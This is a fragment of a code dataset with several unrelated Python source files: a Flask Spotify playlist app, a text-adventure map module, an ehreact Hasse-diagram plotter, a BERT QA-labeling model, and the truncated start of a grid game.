# Get ids of all the artists\n related_artist_ids = [] \n for artist in related_artists[\"artists\"]:\n related_artist_ids.append(artist[\"id\"])\n id = random.choice(related_artist_ids) \n # Get top tracks for a random one of those artists\n result = sp.artist_top_tracks(id, 'US') \n else:\n result = None \n return result\n\n# JSON Parsing function for Spotify API Output\n# Adds songs to destination data structure\ndef add_songs_from_json(json, num_songs, destination):\n tracks = json['tracks'][0:num_songs] \n for track in tracks:\n track_id = track['id']\n album_name = track['album']['name']\n artist_names = []\n for artist in track['artists']:\n artist_names.append(artist['name'])\n track_name = track['name'] \n track_link = track['external_urls']['spotify']\n image = track['album']['images'][0]['url']\n \n destination.append({\n \"id\": track_id,\n \"album\": album_name,\n \"artists\": artist_names,\n \"track\": track_name,\n \"link\": track_link,\n \"img\": image\n }) \n return destination\n\n# Gets top tracks for artists based on name\ndef find_artist_top_tracks(artist_name, country=\"US\"):\n if artist_name == 'The Beatles':\n result = sp.artist_top_tracks('3WrFJ7ztbogyGnTHbHJFl2', 'US') \n elif artist_name == 'Taylor Swift':\n result = sp.artist_top_tracks('06HL4z0CvFAxyc27GXpf02', 'US') \n elif artist_name == 'The Chicks':\n result = sp.artist_top_tracks('25IG9fa7cbdmCIy3OnuH57', 'US') \n elif artist_name == 'Eminem':\n result = sp.artist_top_tracks('7dGJo4pcD2V6oG8kP0tJRR', 'US') \n elif artist_name == 'Beyonce':\n result = sp.artist_top_tracks('6vWDO969PvNqNYHIOW5v0m', 'US') \n elif artist_name == 'Coldplay':\n result = sp.artist_top_tracks('4gzpq5DPGxSnKTe4SA8HAU', 'US') \n elif artist_name == 'Daft Punk':\n result = sp.artist_top_tracks('4tZwfgrHOc3mvqYlEYSvVi', 'US') \n elif artist_name == 'Kamasi Washington':\n result = sp.artist_top_tracks('6HQYnRM4OzToCYPpVBInuU', 'US') \n elif artist_name == 'Wizkid':\n result = sp.artist_top_tracks('3tVQdUvClmAT7URs9V3rsp', 'US') \n elif artist_name == 'Janelle Monae':\n result = sp.artist_top_tracks('6ueGR6SWhUJfvEhqkvMsVs', 'US') \n elif artist_name == 'Kirk Franklin':\n result = sp.artist_top_tracks('4akybxRTGHJZ1DXjLhJ1qu', 'US')\n else:\n pass\n return result\n\n@app.route(\"/saveplaylist\", methods=['POST'])\ndef save_playlist():\n # Get playlist info from form\n json_playlist = request.form['save']\n playlist = json.loads(json_playlist)\n playlist_name = request.form['playlist-name']\n\n # Add playlist to Datastore for user\n username = get_user()\n datastore_playlist = datastore.Entity(datastore_client.key(\"UserPlaylists\"))\n datastore_playlist.update(\n {\n \"username\": username,\n \"playlist\": playlist,\n \"name\": playlist_name\n }\n )\n datastore_client.put(datastore_playlist) \n return redirect(\"/profile\")\n\n@app.route(\"/profile\")\ndef profile():\n user = get_user()\n if user is None:\n return redirect(\"/login\")\n else:\n # Get user data and playlists from Datastore\n userQuery = datastore_client.query(kind=\"UserProfile\")\n userQuery.add_filter(\"username\", \"=\", user)\n userInfo = list(userQuery.fetch())\n userData = userInfo[0]\n playlistQuery = datastore_client.query(kind=\"UserPlaylists\")\n playlistQuery.add_filter(\"username\", \"=\", user)\n playlists = list(playlistQuery.fetch())\n\n # Spotify Auth\n spUrl = spAuth.get_authorize_url()\n login_spotify()\n access_spotify = is_logged_in()\n\n return render_template(\"profile.html\", playlists=playlists, userInfo=userData, auth=True, user=user, spAuthURL=spUrl, spotifyStatus=access_spotify)\n\n@app.route(\"/viewplaylist/\")\ndef view_playlist(playlist_id):\n # Get playlist from Datastore with id to display\n playlist_key = datastore_client.key(\"UserPlaylists\", int(playlist_id))\n playlist = datastore_client.get(playlist_key)\n return render_template(\"view_playlist.html\", playlist=playlist, auth=True, user=get_user())\n\n@app.route(\"/addtospotify/\")\ndef add_playlist_to_spotify(playlist_id):\n # Get access to Spotify\n access_token = login_spotify()\n spToken = spotipy.Spotify(access_token)\n if spToken:\n # Get playlist from database\n playlist_key = datastore_client.key(\"UserPlaylists\", int(playlist_id))\n playlist = datastore_client.get(playlist_key)\n # Create playlist for logged in user using playlist name\n user_id = spToken.me()['id']\n new_spotify_playlist = spToken.user_playlist_create(user_id, playlist[\"name\"])\n # Get playlist id on Spotify\n new_playlist_id = new_spotify_playlist[\"id\"]\n # Get track ids from all tracks in playlist\n tracks_list = list(playlist[\"playlist\"])\n track_ids = []\n for track in tracks_list:\n track_ids.append(track[\"id\"])\n # Add tracks to playlist\n spToken.playlist_add_items(new_playlist_id, track_ids)\n return redirect(\"/profile\")\n\n@app.route(\"/deleteplaylist/\")\ndef delete_playlist(playlist_id):\n playlist_key = datastore_client.key(\"UserPlaylists\", int(playlist_id))\n datastore_client.delete(playlist_key)\n return redirect(\"/profile\")\n\n@app.route(\"/logoutspotify\")\ndef logoutspotify():\n logout_spotify()\n return redirect(\"/profile\")\n\ndef login_spotify():\n access_token = \"\"\n # Check if there is token in session\n token_info = session.get(\"token_info\", None)\n\n # If in session, check if token is expired and refresh it\n if token_info:\n if spAuth.is_token_expired(token_info):\n token_info = spAuth.refresh_access_token(token_info['refresh_token'])\n access_token = token_info['access_token']\n else:\n # If not in session, get code from redirected url\n code = request.args.get(\"code\")\n if code:\n # Get access token from code\n try:\n token_info = spAuth.get_access_token(code)\n access_token = token_info['access_token']\n session['token_info'] = token_info\n except:\n access_token = \"\"\n\n # Return access token or None if empty - user didn't get auth yet\n if access_token:\n return access_token\n else:\n return None\n\ndef logout_spotify():\n session[\"token_info\"] = None\n return redirect(\"/profile\")\n\n# Return status of Spotify login - True if token is valid,\n# False if no token or expired token\ndef is_logged_in():\n token_info = session.get(\"token_info\", None)\n\n if token_info:\n if spAuth.is_token_expired(token_info):\n return False\n return True\n else:\n return False\n\n\"\"\" Profile Login \"\"\"\n@app.route(\"/login\", methods=[\"GET\"])\ndef login_profile():\n return render_template(\"login.html\")\n\n@app.route(\"/login\", methods=[\"POST\"])\ndef user_logon():\n username = request.form.get(\"username\") \n password = request.form.get(\"password\")\n\n if(not check_password(username, password)):\n return render_template(\"login.html\", error=\"Incorrect username or password\", auth=False)\n else:\n session[\"user\"] = username\n return render_template(\"index.html\", auth=True, user=username)\n\n\"\"\" Profile Signup \"\"\"\n@app.route(\"/signup\", methods=[\"GET\"])\ndef signup_service():\n return render_template(\"signup.html\")\n\n@app.route(\"/signup\", methods=[\"POST\", \"PUT\"])\ndef handle_signup():\n username = request.form.get(\"username\")\n email = request.form.get(\"email\")\n password = request.form.get(\"password\")\n\n if(is_unique_username(username) == False or is_unique_email(email) == False):\n return render_template(\"signup.html\", error=\"Sorry the username or email is already in use\")\n \n salt = get_salt()\n hashed_password = get_hashed_password(password, salt)\n create_new_user(username, email, hashed_password, salt)\n set_user(username)\n \n return render_template(\"index.html\", auth=True, user=get_user())\n\n# Route that is no longer utilized.\n@app.route(\"/get_signed_url\", methods=[\"PUT\"])\ndef get_signedurl():\n print(\"Entering get_signedurl\")\n filename = request.json[\"filename\"]\n data_type = request.json[\"contentType\"]\n if not (filename and type):\n # One of the fields was missing in the JSON request\n os.abort()\n\n profile_url = get_signed_url(filename, data_type)\n return jsonify({\"signedUrl\": profile_url})\n\n@app.route(\"/logout\")\ndef handle_logout():\n session.clear()\n return redirect(\"/\")\n\ndef get_user():\n return session.get(\"user\", None)\n\ndef set_user(username):\n session[\"user\"] = username\n\ndef get_profile_pic_name():\n return session.get(\"profile_pic_name\", None)\n\nif __name__ == \"__main__\":\n app.run(host='127.0.0.1', port=8081, debug=True)","repo_name":"joyousjay/CS-1520-Group-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35958796177","text":"import utils\n\nsolids:list[str] = [' ', 'T', 'R', '#']\n\nclass Map():\n def __init__(self):\n self.data:list[list[str]]\n self.width:int\n self.height:int\n self.padding:int\n\n# movement input for map\ndef move_map(currMap:Map, direction:int, playerPos:list[int]):\n # no switch case =(\n oldX:int = playerPos[0]\n oldY:int = playerPos[1]\n\n # move player\n if direction == 0: # up\n playerPos[1] -= 1\n elif direction == 1: # left\n playerPos[0] -= 1\n elif direction == 2: # down\n playerPos[1] += 1\n elif direction == 3: # right\n playerPos[0] += 1\n\n # move player within the bounds of the map if needed\n playerPos[0] = max(min(playerPos[0], currMap.width-1), 0)\n playerPos[1] = max(min(playerPos[1], currMap.height-1), 0)\n\n # check if player is on a solid. if so, move them back\n if currMap.data[playerPos[1]][playerPos[0]] in solids:\n playerPos[0] = oldX\n playerPos[1] = oldY\n\n# generate map\ndef generate_map(width:int, height:int, padding:int = 0, paddingChar = ' ') -> list[list[str]]:\n rows = []\n\n # actual area\n for row in range(0, height):\n cols:list[str] = []\n\n for col in range(0, width):\n cols.append('░')\n rows.append(cols)\n\n # padding\n if not padding == 0:\n # middle\n for row in range(0, height):\n for pad in range(0, padding):\n rows[row].insert(0, paddingChar)\n rows[row].append(paddingChar)\n # top and bottom\n for pad in range(0, padding):\n padRow:list[str] = []\n for col in range(0, padding*2 + width):\n padRow.append(paddingChar)\n rows.insert(0, padRow)\n rows.append(padRow.copy())\n\n return rows\n\n# view area around you\ndef viewMap(currMap:Map, coords:list[int], viewW:int, viewH:int, centerChar:str = 'H', paddingChar:str = ' '):\n view:list[list[str]] = []\n fullViewW = viewW*2+1\n fullViewH = viewH*2+1\n paddingX = int((fullViewW - currMap.width)/2)+1\n paddingY = int((fullViewH - currMap.height)/2)+1\n\n # makes sure it doesnt read data OOBs\n tlCornerX = min(max(0, coords[0] - viewW), currMap.width-fullViewW)\n tlCornerY = min(max(0, coords[1] - viewH), currMap.height-fullViewH)\n playerOffsetX = min(0, coords[0] - viewW)\n playerOffsetY = min(0, coords[1] - viewH)\n\n # generates what we can see with the viewport\n rangeX = min(fullViewW, currMap.width)\n rangeY = min(fullViewH, currMap.height)\n\n for row in range(0, rangeY):\n cols:list[str] = []\n for col in range(0, rangeX):\n cursorX = max(col, tlCornerX + col)\n cursorY = max(row, tlCornerY + row)\n\n if cursorX == coords[0] and cursorY == coords[1]:\n cols.append(centerChar)\n continue\n\n cols.append(currMap.data[cursorY][cursorX])\n view.append(cols)\n\n # if viewport is bigger than map, then center map and apply padding\n if fullViewW > currMap.width:\n for row in view:\n for pad in range(0, paddingX):\n row.insert(0, paddingChar)\n row.append(paddingChar)\n if fullViewH > currMap.height:\n for pad in range(0, paddingY):\n padRow:list[str] = []\n for cols in range(0, fullViewW):\n padRow.append(paddingChar)\n view.insert(0, padRow)\n view.append(padRow.copy())\n\n utils.generateBorder(view, fullViewW, fullViewH)\n","repo_name":"Thielith/python-text-adventure","sub_path":"gameMap.py","file_name":"gameMap.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74013235290","text":"from rdkit.Chem.Draw import rdMolDraw2D\r\nfrom rdkit import Chem\r\nfrom rdkit.Chem import AllChem\r\nimport subprocess\r\n\r\nUSE_IMAGE = True\r\n# TODO use additional option to print tree to the screen (in case a user has no graphviz installed)\r\n\r\n\r\ndef draw_mol(mol, path, change_dict):\r\n \"\"\"\r\n Function to transform and draw a smiles string using rdkit.\r\n\r\n Parameters\r\n ----------\r\n mol: rdkit.Chem.Mol\r\n RDKit molecule.\r\n path: str\r\n Path to which a PNG image is saved.\r\n change_dict: dict\r\n A dictionary of all changes upon going from reactants to products.\r\n \"\"\"\r\n\r\n try:\r\n AllChem.Compute2DCoords(mol)\r\n d = rdMolDraw2D.MolDraw2DCairo(200, 200)\r\n d.drawOptions().prepareMolsBeforeDrawing = False\r\n color_atoms = []\r\n color_bonds = []\r\n color_by_atoms = {}\r\n color_by_bonds = {}\r\n color = (0.8, 0.8, 0.8)\r\n color2 = (0.2, 0.8, 0.2)\r\n color3 = (0.8, 0.1, 0.20)\r\n for atom in mol.GetAtoms():\r\n if atom.HasProp(\"molAtomMapNumber\"):\r\n atom.ClearProp(\"molAtomMapNumber\")\r\n atom_idx = atom.GetIdx()\r\n color_atoms.append(atom_idx)\r\n color_by_atoms[atom_idx] = color\r\n\r\n for idx in change_dict[\"reac\"][\"atom\"].keys():\r\n if (\r\n change_dict[\"prod\"][\"atom\"][idx][0]\r\n > change_dict[\"reac\"][\"atom\"][idx][0]\r\n ):\r\n color_by_atoms[idx] = color2\r\n elif (\r\n change_dict[\"prod\"][\"atom\"][idx][0]\r\n < change_dict[\"reac\"][\"atom\"][idx][0]\r\n ):\r\n color_by_atoms[idx] = color3\r\n else:\r\n color_by_atoms[idx] = color\r\n\r\n for idx in change_dict[\"reac\"][\"bond\"].keys():\r\n bond = mol.GetBondBetweenAtoms(idx[0], idx[1])\r\n bond_idx = bond.GetIdx()\r\n color_bonds.append(bond_idx)\r\n if bond.GetBondType() == Chem.rdchem.BondType.DATIVEL:\r\n color_by_bonds[bond_idx] = color2\r\n bond.SetBondType(change_dict[\"reac\"][\"bond\"][idx][0])\r\n elif bond.GetBondType() == Chem.rdchem.BondType.DATIVER:\r\n color_by_bonds[bond_idx] = color3\r\n bond.SetBondType(change_dict[\"reac\"][\"bond\"][idx][0])\r\n else:\r\n color_by_bonds[bond_idx] = color\r\n bond.SetBondType(change_dict[\"reac\"][\"bond\"][idx][0])\r\n\r\n mol.UpdatePropertyCache()\r\n for atom in mol.GetAtoms():\r\n atom.GetExplicitValence()\r\n\r\n try:\r\n mc = rdMolDraw2D.PrepareMolForDrawing(mol, kekulize=True)\r\n except:\r\n mc = rdMolDraw2D.PrepareMolForDrawing(mol, kekulize=False)\r\n\r\n if color_atoms != [] or color_bonds != []:\r\n d.DrawMolecule(\r\n mc,\r\n highlightAtoms=color_atoms,\r\n highlightBonds=color_bonds,\r\n highlightAtomColors=color_by_atoms,\r\n highlightBondColors=color_by_bonds,\r\n )\r\n else:\r\n d.DrawMolecule(mc)\r\n\r\n d.FinishDrawing()\r\n pic = d.GetDrawingText()\r\n with open(path, \"wb\") as f:\r\n f.write(pic)\r\n except Exception as e:\r\n print(e)\r\n print(\"Could not plot one of the molecules\")\r\n\r\n\r\ndef write_beginning_dotfile(temp_dir_img):\r\n \"\"\"\r\n Write the beginning of the dotfile (graphviz input).\r\n\r\n Parameters\r\n ----------\r\n temp_dir_img: str\r\n Directory to save images to temporarily.\r\n \"\"\"\r\n\r\n file = open(temp_dir_img + \"/image_specs.txt\", \"w\")\r\n\r\n file.write(\"digraph {\\n\")\r\n file.write(\"fontsize = 20\\n\")\r\n file.write(\"rank = sink\\n\")\r\n file.write(\"rankdir = RL\\n\")\r\n file.write('ranksep = \"1.5\"\\n')\r\n file.write('nodesep = \"0.2\"\\n')\r\n file.write('size = \"100,100\"')\r\n\r\n file.write(\"node[\")\r\n file.write(\"penwidth = 5\\n\")\r\n file.write(\"color = blue\\n\")\r\n file.write('fillcolor = \"#ffffff\"\\n')\r\n file.write(\"fontcolor = black\\n\")\r\n file.write(\"fontsize = 20\\n\")\r\n file.write(\"fontname = Helvetica\\n\")\r\n file.write(\"shape = square\\n\")\r\n file.write(\"style = filled\\n]\")\r\n\r\n file.write(\"edge [ arrowhead = open\\n\")\r\n file.write(\"color = black\\n\")\r\n file.write(\"fontcolor = black\\n\")\r\n file.write(\"fontname = Courier\\n\")\r\n file.write(\"fontsize = 12\\n\")\r\n file.write(\"style = solid\\n\")\r\n file.write(\"]\\n\")\r\n\r\n file.close()\r\n\r\n\r\ndef write_end_dotfile(temp_dir_img):\r\n \"\"\"\r\n Write the end of the dotfile (graphviz input).\r\n\r\n Parameters\r\n ----------\r\n temp_dir_img: str\r\n Directory to save images to temporarily.\r\n \"\"\"\r\n\r\n file = open(temp_dir_img + \"/image_specs.txt\", \"a\")\r\n file.write(\"}\")\r\n file.close()\r\n\r\n\r\ndef run_dot(temp_dir_img, save_plot):\r\n \"\"\"\r\n Runs graphviz to plot the Hasse diagram.\r\n\r\n Parameters\r\n ----------\r\n temp_dir_img: str\r\n Directory to save images to temporarily.\r\n save_plot: str\r\n File name to save PNG image to.\r\n \"\"\"\r\n\r\n subprocess.check_call(\r\n \"dot -o\"\r\n + temp_dir_img\r\n + \"/diagram.svg -Tsvg \"\r\n + temp_dir_img\r\n + \"/image_specs.txt\",\r\n shell=True,\r\n )\r\n subprocess.check_call(\r\n \"rsvg-convert \" + temp_dir_img + \"/diagram.svg >\" + save_plot, shell=True\r\n )\r\n\r\n\r\ndef write_node(temp_dir_img, smiles, mol, is_leaf, file_numbers, change_dict):\r\n \"\"\"\r\n Function to write a single node information to the image specification file\r\n\r\n Parameters\r\n ----------\r\n temp_dir_img: str\r\n Directory to save images to temporarily.\r\n smiles: str\r\n SMILES string of the current node.\r\n mol: rdkit.Chem.Mol\r\n RDKit molecule to be drawn.\r\n is_leaf: bool\r\n Whether the current node is a leaf node.\r\n file_numbers: int\r\n Consecutive file identifier.\r\n change_dict: dict\r\n A dictionary of all changes upon going from reactants to products.\r\n \"\"\"\r\n\r\n file = open(temp_dir_img + \"/image_specs.txt\", \"a\")\r\n file.write(double_quoted(smiles))\r\n file.write(\"[\")\r\n file.write(\"label=\" + double_quoted(\"\"))\r\n if is_leaf:\r\n file.write(\"color=\" + \"black\" + \" \")\r\n else:\r\n file.write(\"color=\" + \"red\" + \" \")\r\n\r\n if USE_IMAGE and smiles != \"\":\r\n file.write(\r\n 'image=\"' + temp_dir_img + \"/\" + file_numbers[smiles] + \".png\" + '\"\\n'\r\n )\r\n draw_mol(\r\n mol=mol,\r\n path=temp_dir_img + \"/\" + file_numbers[smiles] + \".png\",\r\n change_dict=change_dict,\r\n )\r\n file.write(\"shape=square \")\r\n file.write(\"]\\n\")\r\n\r\n\r\ndef write_edge(temp_dir_img, smiles1, smiles2):\r\n \"\"\"\r\n Function to write a single edge information to the image specification file\r\n\r\n Parameters\r\n ----------\r\n temp_dir_img: str\r\n Directory to save images to temporarily.\r\n smiles1: str\r\n SMILES string of the parent node.\r\n smiles2: str\r\n SMILES string of the child node.\r\n \"\"\"\r\n\r\n file = open(temp_dir_img + \"/image_specs.txt\", \"a\")\r\n\r\n assert not ('\"' in smiles1 or '\"' in smiles2)\r\n\r\n file.write(double_quoted(smiles2))\r\n file.write(\" -> \")\r\n file.write(double_quoted(smiles1))\r\n\r\n file.write(\"[dir=back \")\r\n file.write(\"shape=vee \")\r\n\r\n file.write(\"]\\n\")\r\n\r\n\r\ndef double_quoted(s):\r\n \"\"\"\r\n Function to put double quotes around a string.\r\n\r\n Parameters\r\n ----------\r\n s: str\r\n String.\r\n\r\n Returns\r\n -------\r\n str\r\n String in double quotes.\r\n \"\"\"\r\n\r\n return '\"' + s + '\"'\r\n\r\n\r\ndef remove_linear_chains(d):\r\n \"\"\"\r\n Function to remove nodes that have exactly one parent and one child.\r\n\r\n Parameters\r\n ----------\r\n d: ehreact.diagram.diagram.Diagram\r\n A Hasse diagram.\r\n\r\n Returns\r\n -------\r\n d: ehreact.diagram.diagram.Diagram\r\n The modified Hasse diagram without linear chain nodes.\r\n \"\"\"\r\n\r\n node_list = list(d.nodes)\r\n for n in node_list:\r\n key_node = n\r\n if key_node == \"\":\r\n continue\r\n key_parent = d.nodes[n].edges_to_parent[0].parent_node.key\r\n if len(d.nodes[n].edges_to_child) == 1:\r\n d.move_node(\r\n key_node=d.nodes[n].edges_to_child[0].child_node.key,\r\n key_parent_new=key_parent,\r\n )\r\n d.delete_edges_around_node(d.nodes[n].key)\r\n return d\r\n\r\n\r\ndef plot_hasse(d, temp_dir_img, save_plot, plot_only_branches):\r\n \"\"\"\r\n Function to plot a Hasse diagram.\r\n\r\n Parameters\r\n ----------\r\n d: ehreact.diagram.diagram.Diagram\r\n A Hasse diagram.\r\n temp_dir_img: str\r\n Directory to save images to temporarily.\r\n save_plot: str\r\n File name to save PNG image to.\r\n plot_only_branches: bool\r\n Whether to remove linear chain nodes.\r\n \"\"\"\r\n\r\n file_numbers = {}\r\n write_beginning_dotfile(temp_dir_img)\r\n smiles = \"\"\r\n seed = \"\"\r\n is_leaf = d.nodes[smiles].is_leaf\r\n mol = d.nodes[smiles].rule\r\n\r\n if plot_only_branches:\r\n d_compressed = remove_linear_chains(d)\r\n plot_iteration(\r\n temp_dir_img,\r\n d=d_compressed,\r\n smiles=smiles,\r\n mol=mol,\r\n is_leaf=is_leaf,\r\n file_numbers=file_numbers,\r\n seed=seed,\r\n )\r\n else:\r\n plot_iteration(\r\n temp_dir_img,\r\n d=d,\r\n smiles=smiles,\r\n mol=mol,\r\n is_leaf=is_leaf,\r\n file_numbers=file_numbers,\r\n seed=seed,\r\n )\r\n write_end_dotfile(temp_dir_img)\r\n run_dot(temp_dir_img, save_plot)\r\n\r\n\r\ndef plot_iteration(temp_dir_img, d, smiles, mol, is_leaf, file_numbers, seed):\r\n \"\"\"\r\n Recursive function to plot the diagram. Per call, all current child nodes and corresponding edges are plotted.\r\n\r\n Parameters\r\n ----------\r\n temp_dir_img: str\r\n Directory to save images to temporarily.\r\n d: ehreact.diagram.diagram.Diagram\r\n A Hasse diagram.\r\n smiles: str\r\n SMILES string of the current node.\r\n mol: rdkit.Chem.Mol\r\n RDKit molecule to be drawn.\r\n is_leaf: bool\r\n Whether the current node is a leaf node.\r\n file_numbers: int\r\n Consecutive file identifier.\r\n seed: int\r\n Name of the minimal template of the current branch.\r\n \"\"\"\r\n\r\n file_numbers[smiles] = str(len(file_numbers.keys()))\r\n if smiles != \"\" and d.nodes[\"\"].change_dict != {}:\r\n change_dict = d.nodes[\"\"].change_dict[seed]\r\n else:\r\n change_dict = {\r\n \"reac\": {\"atom\": {}, \"bond\": {}},\r\n \"prod\": {\"atom\": {}, \"bond\": {}},\r\n }\r\n\r\n write_node(\r\n temp_dir_img,\r\n smiles=smiles,\r\n mol=mol,\r\n is_leaf=is_leaf,\r\n file_numbers=file_numbers,\r\n change_dict=change_dict,\r\n )\r\n for edge in d.nodes[smiles].edges_to_child:\r\n child = edge.child_node.key\r\n write_edge(temp_dir_img, smiles2=child, smiles1=smiles)\r\n plot_iteration(\r\n temp_dir_img,\r\n d=d,\r\n smiles=child,\r\n mol=d.nodes[child].rule,\r\n is_leaf=d.nodes[child].is_leaf,\r\n file_numbers=file_numbers,\r\n seed=d.nodes[child].lowest_template,\r\n )\r\n","repo_name":"hesther/ehreact","sub_path":"ehreact/diagram/plot_hasse.py","file_name":"plot_hasse.py","file_ext":"py","file_size_in_byte":11332,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"7428223092","text":"from transformers import *\nimport torch\nfrom torchvision import datasets, models, transforms\nimport torch.nn as nn\nfrom config.bert_config import cfg\nfrom src.common import *\n\nclass BertForQuest(BertPreTrainedModel):\n def __init__(self):\n super(BertForQuest, self).__init__(config)\n self.num_labels = config.num_labels\n\n self.bert = BertModel(config).from_pretrained(model_dir, config=config)\n self.bert_qa = BertModel(config).from_pretrained(model_dir, config=config)\n\n self.layer_num = cfg[\"Last_Layer\"]\n\n self.head1 = nn.Sequential(\n nn.Linear(self.layer_num * cfg[\"hidden_size\"], cfg[\"hidden_size\"]),\n nn.Tanh(),\n nn.Dropout(0.2),\n nn.Linear(cfg[\"hidden_size\"], 21),\n )\n\n self.head2 = nn.Sequential(\n nn.Linear(self.layer_num * cfg[\"hidden_size\"], cfg[\"hidden_size\"]),\n nn.Tanh(),\n nn.Dropout(0.2),\n nn.Linear(cfg[\"hidden_size\"], 9),\n )\n\n print(\"*************qa9 output.***************\")\n\n # self.init_weights()\n\n def forward(self, q_ids, q_attention_mask, q_seg_ids, qa_ids, qa_attention_mask, qa_seg_ids):\n _, _, q_hidden_states = self.bert(input_ids=q_ids, token_type_ids=q_seg_ids, attention_mask=q_attention_mask)\n q_h = []\n for i in range(1, self.layer_num + 1):\n q_h.append(q_hidden_states[-i][:, 0])\n\n q_h = torch.cat(q_h, 1)\n\n y1 = self.head1(q_h)\n\n _, _, qa_hidden_states = self.bert_qa(input_ids=qa_ids, token_type_ids=qa_seg_ids,\n attention_mask=qa_attention_mask)\n qa_h = []\n for i in range(1, self.layer_num + 1):\n qa_h.append(qa_hidden_states[-i][:, 0])\n\n qa_h = torch.cat(qa_h, 1)\n y2 = self.head2(qa_h)\n\n output = torch.cat([y1, y2], 1).sigmoid()\n return output\n\n\nclass PooledBertForQuest(nn.Module):\n def __init__(self):\n super().__init__()\n self.num_labels = bert_config.num_labels\n\n self.bert = BertModel(bert_config).from_pretrained(bertModel_dir, config=bert_config)\n self.bert_qa = BertModel(bert_config).from_pretrained(bertModel_dir, config=bert_config)\n\n self.layer_num = cfg[\"Last_Layer\"]\n print(\"*************Pooled & Norm structure and qa30 output.***************\")\n\n self.head1 = nn.Sequential(\n nn.Linear(768 * 8, 768 * 4),\n nn.ReLU(inplace=True),\n nn.LayerNorm(768 * 4),\n nn.Dropout(0.2),\n nn.Linear(768 * 4, 21),\n )\n\n self.head2 = nn.Sequential(\n nn.Linear(768 * 8, 768 * 4),\n nn.ReLU(inplace=True),\n nn.LayerNorm(768 * 4),\n nn.Dropout(0.2),\n nn.Linear(768 * 4, 30),\n )\n\n # self.init_weights()\n\n def forward(self, q_ids, q_attention_mask, q_seg_ids, qa_ids, qa_attention_mask, qa_seg_ids):\n outputs_q = self.bert(input_ids=q_ids, attention_mask=q_attention_mask, token_type_ids=q_seg_ids)\n\n outputs_qa = self.bert_qa(input_ids=qa_ids, attention_mask=qa_attention_mask, token_type_ids=qa_seg_ids)\n\n q_pooled_output_avg = torch.nn.functional.adaptive_avg_pool2d(outputs_q[0], (1, 768))\n q_pooled_output_avg = torch.squeeze(q_pooled_output_avg, 1)\n q_pooled_output_max = torch.nn.functional.adaptive_max_pool2d(outputs_q[0], (1, 768))\n q_pooled_output_max = torch.squeeze(q_pooled_output_max, 1)\n q_pooled_output = torch.cat([q_pooled_output_avg, q_pooled_output_max], 1)\n qa_pooled_output_avg = torch.nn.functional.adaptive_avg_pool2d(outputs_qa[0], (1, 768))\n qa_pooled_output_avg = torch.squeeze(qa_pooled_output_avg, 1)\n qa_pooled_output_max = torch.nn.functional.adaptive_max_pool2d(outputs_qa[0], (1, 768))\n qa_pooled_output_max = torch.squeeze(qa_pooled_output_max, 1)\n qa_pooled_output = torch.cat([qa_pooled_output_avg, qa_pooled_output_max], 1)\n q_mean_pool = torch.mean(torch.cat(outputs_q[2][-3:], 2), 1)\n q_max_pool, _ = torch.max(torch.cat(outputs_q[2][-3:], 2), 1)\n q_pooler_output = torch.cat([q_mean_pool, q_max_pool], 1)\n qa_mean_pool = torch.mean(torch.cat(outputs_qa[2][-3:], 2), 1)\n qa_max_pool, _ = torch.max(torch.cat(outputs_qa[2][-3:], 2), 1)\n qa_pooler_output = torch.cat([qa_mean_pool, qa_max_pool], 1)\n q_feature = torch.cat([q_pooled_output, q_pooler_output], 1)\n qa_feature = torch.cat([qa_pooled_output, qa_pooler_output], 1)\n y1 = self.head1(q_feature)\n y2 = self.head2(qa_feature)\n q_out = (y1 + y2[:, :21]) / 2\n output = torch.cat([q_out, y2[:, 21:]], 1).sigmoid()\n return output\n","repo_name":"iamxpy/qa-labeling","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3028095935","text":"from game2d import *\nfrom consts import *\nfrom models import *\nimport random\nimport math\nimport introcs\nimport sys\n\n\n\n\n###WAVE\nclass Game(object):\n\n\n def getGameOver(self):\n \"\"\"\n check if the game is over\n \"\"\"\n return self._gameover\n\n def getScore(self):\n \"\"\"\n Returns the score of the game (for endless mode)\n \"\"\"\n return self._score\n\n\n def __init__(self, hscore):\n \"\"\"\n initialize the features of the game. It takes the number of rows, columns,\n and bombs as parameters that are passed based on the difficulty level.\n It sets the game arena, the locations of the bombs, the number of neighboring\n bombs that each tile has, and if the mouse is clicked.\n \"\"\"\n self._time = 0\n self._highscore = hscore\n self._gameover = 'no'\n self._grid = self.grid()\n self.press = 0\n self.d = None\n\n self._arena_x1 = None\n self._arena_x2 = None\n self._arena_y1 = None\n self._arena_y2 = None\n\n self._arena = self.arena()\n self._boxlist= self.start()\n self.occupied = self.occupiedList()\n print(self.occupied)\n self._speed = 0.1\n self._movetimer = 0\n\n print(self._arena_x1)\n print(\"hey\")\n self._start = True\n self._gameLine = None\n\n self._score = 0\n self._scoreline = None\n self._helpline = GLabel(text = \"Click to open the boxes. \\n Shift+click to diffuse bomb\",font_size= 20,\n x= GAME_WIDTH/2, y= GAME_HEIGHT-100)\n\n\n\n\n\n\n\n###General methods\n\n\n def scoreline(self):\n \"\"\"\n Draws and updates the scoreline based on how many pieces of food the player\n has eaten.\n \"\"\"\n self.bombsLeft = self._numbombs-self._countshields\n self._scoreline = GLabel(text = (\"Bombs Left: \" + str(self.bombsLeft)),\n font_size= 20, x= GAME_WIDTH/2, y= GAME_HEIGHT-30)\n\n def timeline(self):\n \"\"\"\n Draws the line that gives the amount of time that the game has been going on for\n \"\"\"\n time = round(self._time, 1)\n self._timeline = GLabel(text = (\"Time: \" + str(time)),\n font_size= 10, x= GAME_WIDTH-30, y= GAME_HEIGHT-30)\n\n\n def arena(self):\n \"\"\"\n defines the area of the arena and fills in with rectanges.\n \"\"\"\n rows = 4\n columns = 4\n ARENA_WIDTH = columns *SIDE_LENGTH\n ARENA_LENGTH = rows * SIDE_LENGTH\n midX = GAME_WIDTH/2\n left = midX - ARENA_WIDTH/2\n right = midX + ARENA_WIDTH/2\n\n\n midY = GAME_HEIGHT//2\n top = midY + ARENA_LENGTH/2\n bottom = midY - ARENA_LENGTH/2\n pos = 0\n\n alist = []\n\n self._arena_x1 = left\n self._arena_x2 = right\n self._arena_y1 = 